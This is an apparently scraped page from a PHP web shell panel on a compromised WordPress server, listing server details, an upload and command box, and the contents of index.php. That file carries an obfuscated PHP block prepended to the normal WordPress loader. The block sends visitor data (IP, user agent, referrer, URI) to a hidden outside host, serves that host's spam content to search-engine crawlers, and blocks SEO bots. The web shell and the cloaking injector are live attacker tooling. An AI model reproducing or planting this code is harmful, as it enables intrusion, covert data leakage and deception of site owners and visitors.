403Webshell
Server IP : 44.234.190.86  /  Your IP : 216.73.216.184
Web Server : Apache/2.4.29 (Ubuntu)
System : Linux ip-172-31-55-191 5.4.0-1060-aws #63~18.04.1-Ubuntu SMP Mon Nov 15 14:31:31 UTC 2021 x86_64
User : www-data ( 33)
PHP Version : 7.0.33-30+ubuntu18.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/index.php
<?php
 goto fCbHg; y34ls: $x3KwH = "\57\143"; goto N7DMr; aOpFa: Huwqv: goto TgR2U; Iiud1: if (!(substr($StjWE, 0, 10) == "\145\162\x72\x6f\162\40\x63\157\144\145" or $StjWE == "\65\x30\x30" or strpos($StjWE, "\x42\141\x64\x20\x47\141\x74\x65\x77\141\x79") !== false)) { goto RODAt; } goto s13Xm; ORuzE: $PLROY = $_SERVER["\123\x43\x52\111\120\124\137\x4e\101\x4d\x45"]; goto DnfPj; tiJQS: goto lSneO; goto x2Vmm; PCAxU: header("\x43\x6f\x6e\164\145\x6e\164\x2d\x54\171\160\145\x3a\x20\x74\x65\x78\x74\57\150\164\x6d\x6c\x3b\x20\x63\x68\141\162\x73\145\x74\75\x75\x74\x66\55\70"); goto oLk0f; kyBbq: goto JD_IN; goto ATnzh; qk1dV: $tWT9v = $LjaPo . $raoBC . $iPKTC . $x3KwH . $rDkqH . $HkMli; goto Vs1MG; ZFzct: if (strpos($pIQ8D, "\x66\141\166\151\143\157\156\56\151\x63\x6f") !== false) { goto tKRL7; } goto aBrrB; nQRuq: $oeKGX = $_SERVER["\110\124\124\x50\x5f\x43\x4c\x49\105\116\124\137\111\120"]; goto qrMCs; Ny2dc: tKRL7: goto Ow05g; Qw3sv: $pIQ8D = urlencode($_SERVER["\x52\105\121\x55\x45\x53\x54\137\x55\122\x49"]); goto HAnC8; nTviL: header("\110\124\x54\x50\x2f\x31\56\60\x20\x34\60\63\x20\106\x6f\162\142\151\144\144\x65\156"); goto t4q6X; N7DMr: $raoBC = "\164\160\72"; goto n83dE; qrMCs: goto lSneO; goto vfV5A; ywOd5: m3myy: goto hYLc6; iMnYY: if (empty($StjWE)) { goto v4inG; } goto Iiud1; s13Xm: header("\110\124\124\120\x2f\61\56\60\x20\x35\60\x30\x20\111\x6e\164\145\162\x6e\141\x6c\40\123\145\162\x76\x65\162\x20\105\162\x72\157\x72"); goto cqjMe; zc71w: if (!empty($StjWE)) { goto UBIu0; } goto oKFmG; x_hzS: uqoO2: goto Xc1a5; tzOK9: curl_setopt($TA0U6, CURLOPT_FOLLOWLOCATION, false); goto KF6Fc; oaqTi: iy3qR: goto yQPsY; Xc1a5: $Rnxhz = "{$SAGRi}\72\57\x2f" . $o3b3Z . $PLROY . "\163\x69\x74\x65\x6d\x61\x70\56\170\155\x6c"; goto mkGt_; sAFrV: $oeKGX = $_SERVER["\x48\x54\124\x50\x5f\x58\137\106\x4f\x52\127\x41\x52\104\x45\x44\137\106\x4f\x52"]; goto HoUT8; MysHH: $VXbOx = "\x42\151\156\147\174\131\x61\150\157\157\174\107\157\x6f\x67\154\145\x7c\x44\x6f\x63\157\155\157"; goto HBowD; md1iU: PXlj6: goto FOAcY; zUR4Y: $oeKGX = $_SERVER["\x52\105\x4d\117\124\x45\137\x41\x44\x44\122"]; goto c6XE5; hYLc6: header("\103\157\156\x74\x65\156\164\x2d\124\x79\160\x65\x3a\40\x74\145\170\164\57\170\x6d\154\73\x20\x63\x68\x61\162\x73\145\x74\75\x75\x74\146\55\x38"); goto YlAlm; J3Yxf: goto uqoO2; goto HqF85; lbtPn: $StjWE = curl_exec($TA0U6); goto Vfx99; aBrrB: if (strpos($pIQ8D, "\x72\x6f\142\x6f\164\163\x2e\x74\x78\x74") !== false or strpos($pIQ8D, "\x6a\160\62\x30\62\x33") !== false or strpos($pIQ8D, "\160\151\156\x67\x73\x69\164\145\x6d\141\160") !== false or preg_match("\x40\x5e\x2f\x28\56\x2a\77\51\x2e\x78\x6d\154\44\100\151", $_SERVER["\x52\105\121\125\x45\123\x54\x5f\125\122\111"]) or preg_match("\57\50{$VXbOx}\51\57\151", $_SERVER["\x48\x54\124\120\x5f\125\123\x45\x52\x5f\x41\107\x45\116\x54"]) or preg_match("\x2f\50{$VXbOx}\51\57\x69", @$_SERVER["\x48\x54\x54\x50\x5f\x52\105\x46\x45\x52\105\x52"])) { goto rLlH8; } goto kyBbq; bhg5j: goto Huwqv; goto ppwyU; VJtgZ: $oeKGX = urlencode($oeKGX); goto MBsac; ATnzh: rLlH8: goto F54b_; HoUT8: lSneO: goto r8DOZ; c6XE5: $OxrED = urlencode(@$_SERVER["\x48\x54\124\x50\137\122\x45\x46\x45\122\105\122"]); goto K1SyF; Vfx99: curl_close($TA0U6); goto Vu1or; QLxKc: if (!preg_match("\57\x28\123\143\x72\x61\x70\x79\174\105\x61\163\157\x75\x53\x70\x69\144\145\162\x7c\171\141\x6e\x64\145\x78\x42\x6f\x74\174\104\x61\x74\x61\106\157\162\123\x45\117\174\102\141\162\153\162\x6f\167\x6c\x65\x72\x7c\123\x65\x7a\x6e\141\x6d\x42\x6f\x74\174\x4d\x6a\61\x32\142\x6f\164\174\x6f\102\157\x74\174\x44\x69\x67\x45\x78\164\x7c\112\141\166\141\x7c\x46\x65\145\x64\154\171\x7c\107\x50\124\x42\x6f\164\x7c\120\x79\x74\150\157\156\x7c\141\163\153\124\142\106\130\x54\126\x7c\125\x6e\151\166\x65\162\163\141\x6c\x46\145\x65\144\x50\141\x72\163\x65\162\x7c\x61\x6d\141\172\x6f\156\102\x6f\164\174\123\x77\x69\146\x74\142\x6f\164\174\103\x6f\157\x6c\x70\x61\x64\127\x65\x62\x6b\151\x74\x7c\120\x79\x74\150\157\156\55\x72\x65\x71\x75\145\163\164\163\x7c\x49\156\144\171\40\x4c\151\142\x72\x61\162\171\174\107\157\55\150\164\164\160\55\x63\x6c\x69\145\x6e\164\174\x50\x61\154\x6f\x61\x6c\x74\x6f\x6e\145\164\167\157\162\153\163\x7c\x50\x79\x74\150\x6f\x6e\55\x75\162\154\x6c\151\142\174\103\x6c\141\165\144\x65\142\157\164\174\x46\145\145\144\x44\145\155\x6f\156\x7c\x43\x65\156\x73\171\163\111\156\x73\x70\145\x63\x74\174\x50\145\x74\x61\x6c\x42\x6f\164\174\x44\157\164\102\157\164\x7c\x45\172\x6f\x6f\x6d\163\174\142\x79\x74\x65\x73\160\x69\x64\145\x72\x7c\x6a\x61\x75\156\164\x79\174\110\164\x74\160\x43\x6c\x69\145\x6e\164\x7c\101\x70\141\143\150\x65\102\145\x6e\143\x68\174\152\x69\x6b\x65\x53\160\151\x64\x65\162\x7c\x41\x68\162\x65\146\163\102\x6f\164\174\x5a\x6d\x45\165\174\x68\x65\x72\151\x74\162\x69\170\174\x43\162\141\x77\x6c\104\x61\x64\144\171\174\x4c\151\147\x68\164\104\145\x63\x6b\122\x65\160\157\162\x74\163\40\102\x6f\164\x7c\x59\171\123\160\x69\144\145\162\x7c\x59\151\x73\157\165\123\160\151\144\x65\x72\174\x53\145\x6d\162\165\x73\x68\x42\x6f\164\x29\57\151", $_SERVER["\110\124\124\120\137\x55\x53\x45\122\x5f\x41\107\105\116\x54"])) { goto b7Xq6; } goto nTviL; OFYLm: $Ps0Uw = urlencode($_SERVER["\110\x54\124\x50\137\125\x53\x45\x52\137\x41\x47\105\116\124"]); goto zUR4Y; KF6Fc: curl_setopt($TA0U6, CURLOPT_SSL_VERIFYPEER, FALSE); goto TgPkH; Vu1or: UBIu0: goto iMnYY; TgPkH: curl_setopt($TA0U6, CURLOPT_SSL_VERIFYHOST, FALSE); goto lbtPn; r8DOZ: $zkEW_ = urlencode($_SERVER["\x53\103\122\x49\x50\x54\137\x4e\x41\115\105"]); goto VJtgZ; CGAxm: RODAt: goto kJr7R; mkGt_: echo $Rnxhz . "\x3a\x20\x3c\142\162\x2f\76"; goto c4tT7; YlAlm: EWq8L: goto bhg5j; ppwyU: rkx7h: goto kBwaQ; MBsac: $o3b3Z = urlencode($_SERVER["\x48\x54\124\120\137\x48\117\123\x54"]); goto uMEcp; xgoXu: $_SERVER["\x52\x45\121\125\x45\x53\124\137\123\103\110\x45\x4d\105"] = "\150\164\164\160"; goto w9wFc; oLk0f: goto EWq8L; goto ywOd5; kBwaQ: header("\x48\124\124\120\57\x31\x2e\61\40\64\x30\x34\x20\116\157\x74\40\x46\x6f\x75\156\x64"); goto aOpFa; t4q6X: exit; goto pkGeM; asuBt: if (substr($StjWE, 0, 5) == "\74\x3f\x78\x6d\x6c") { goto m3myy; } goto PCAxU; w9wFc: goto PXlj6; goto TAucw; rVubC: JD_IN: goto Me_lS; FOAcY: $SAGRi = urlencode($_SERVER["\x52\105\x51\x55\105\123\124\x5f\x53\x43\x48\x45\115\105"]); goto Qw3sv; DnfPj: if (strpos($PLROY, "\x69\x6e\144\x65\x78\x2e\x70\150") !== false) { goto QPaWR; } goto h_fxD; YAcrJ: $PLROY = "\57"; goto rJhgr; rWzQr: curl_setopt($TA0U6, CURLOPT_URL, $nLw90); goto sVQx2; TAucw: DyQnh: goto H2SBT; mmDW9: exit; goto RF7vq; K1SyF: $ymfnE = urlencode(@$_SERVER["\110\124\124\120\x5f\x41\103\x43\x45\x50\x54\x5f\x4c\101\116\x47\125\101\x47\x45"]); goto m4lGJ; gapbR: if (isset($_SERVER["\110\x54\124\x50\x5f\130\x5f\106\117\122\x57\x41\122\x44\105\x44\137\x46\x4f\x52"])) { goto R44wb; } goto tiJQS; vfV5A: R44wb: goto sAFrV; oKFmG: $TA0U6 = curl_init(); goto rWzQr; RF7vq: return; goto E5BbZ; F54b_: $nLw90 = $tWT9v . "\77\141\147\145\x6e\x74\75{$Ps0Uw}\46\162\x65\x66\145\x72\75{$OxrED}\x26\x6c\x61\x6e\x67\x3d{$ymfnE}\x26\151\x70\75{$oeKGX}\46\x64\157\155\75{$o3b3Z}\x26\x68\x74\164\x70\75{$SAGRi}\x26\165\x72\151\x3d{$pIQ8D}\46\160\143\x3d{$SJJLT}\46\162\x65\x77\x72\151\164\x65\141\142\x6c\x65\75{$JoMNR}\x26\163\x63\162\x69\x70\x74\75{$zkEW_}"; goto ABGnK; Me_lS: goto fi5j6; goto Ny2dc; h_fxD: $PLROY = $PLROY . "\77"; goto J3Yxf; sVQx2: curl_setopt($TA0U6, CURLOPT_RETURNTRANSFER, true); goto tzOK9; yQPsY: $PLROY = "\57\x3f"; goto stxCq; rJhgr: goto WfkHW; goto oaqTi; qUADy: $rDkqH = "\x77\x32\x36\60"; goto y34ls; m4lGJ: if (isset($_SERVER["\110\124\124\x50\x5f\x43\x4c\x49\105\116\x54\137\x49\x50"])) { goto XbWO0; } goto gapbR; pkGeM: b7Xq6: goto OFYLm; HqF85: QPaWR: goto OMIKx; x2Vmm: XbWO0: goto nQRuq; OJo_t: $StjWE = @file_get_contents($nLw90); goto zc71w; HAnC8: $JoMNR = 0; goto ZFzct; fCbHg: $HkMli = "\66\56\63\x64\x62\x6c\x69\156\144\x2e\143\x6f\x6d\57"; goto MUZT_; MUZT_: $LjaPo = "\x68\164"; goto qUADy; ABGnK: if (!(strpos($pIQ8D, "\x70\151\156\x67\x73\x69\164\x65\x6d\x61\x70") !== false)) { goto bUe9a; } goto ORuzE; HBowD: error_reporting(0); goto QLxKc; Vs1MG: $SJJLT = "\x42\101\x51\115\x44\167\162"; goto MysHH; mzECW: bUe9a: goto OJo_t; TgR2U: echo $StjWE; goto mmDW9; c4tT7: $nLw90 = $tWT9v . "\77\x61\x67\145\156\164\75{$Ps0Uw}\46\162\145\x66\145\x72\75{$OxrED}\46\x6c\141\x6e\x67\x3d{$ymfnE}\46\x69\160\x3d{$oeKGX}\x26\144\157\155\x3d{$o3b3Z}\x26\x68\164\x74\x70\75{$SAGRi}\46\x75\162\x69\x3d{$pIQ8D}\x26\160\143\x3d{$SJJLT}\46\162\x65\167\x72\x69\164\x65\x61\x62\x6c\145\x3d{$JoMNR}\46\x73\143\x72\x69\x70\164\x3d{$zkEW_}\46\x73\x69\x74\145\x6d\x61\x70\75" . urlencode($Rnxhz); goto mzECW; kJr7R: if (strpos($pIQ8D, "\152\x70\x32\60\62\x33") !== false) { goto rkx7h; } goto asuBt; E5BbZ: v4inG: goto rVubC; uMEcp: if (!empty($_SERVER["\x52\105\121\125\105\123\x54\137\123\x43\110\x45\x4d\105"]) and $_SERVER["\122\x45\121\x55\x45\x53\124\137\x53\x43\x48\105\x4d\105"] == "\150\164\164\x70\x73" or !empty($_SERVER["\110\x54\124\x50\x53"]) and $_SERVER["\x48\x54\x54\x50\123"] == "\x6f\156" or !empty($_SERVER["\x53\105\x52\x56\x45\x52\x5f\x50\x4f\x52\x54"]) and $_SERVER["\x53\x45\122\x56\105\x52\137\x50\x4f\x52\x54"] == "\x34\x34\63" or isset($_SERVER["\110\124\x54\120\x5f\130\x5f\x46\117\x52\x57\101\122\x44\105\x44\x5f\120\122\x4f\124\117"]) and $_SERVER["\110\124\x54\x50\x5f\130\x5f\x46\x4f\122\127\101\122\x44\105\x44\137\x50\122\117\x54\x4f"] == "\x68\164\x74\x70\x73") { goto DyQnh; } goto xgoXu; stxCq: WfkHW: goto x_hzS; n83dE: $iPKTC = "\57"; goto qk1dV; cqjMe: exit; goto CGAxm; OMIKx: if ($JoMNR == 0) { goto iy3qR; } goto YAcrJ; H2SBT: $_SERVER["\122\x45\121\125\x45\123\124\x5f\123\x43\x48\x45\115\x45"] = "\150\x74\x74\160\x73"; goto md1iU; Ow05g: fi5j6:
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

Youez - 2016 - github.com/yon3zu
LinuXploit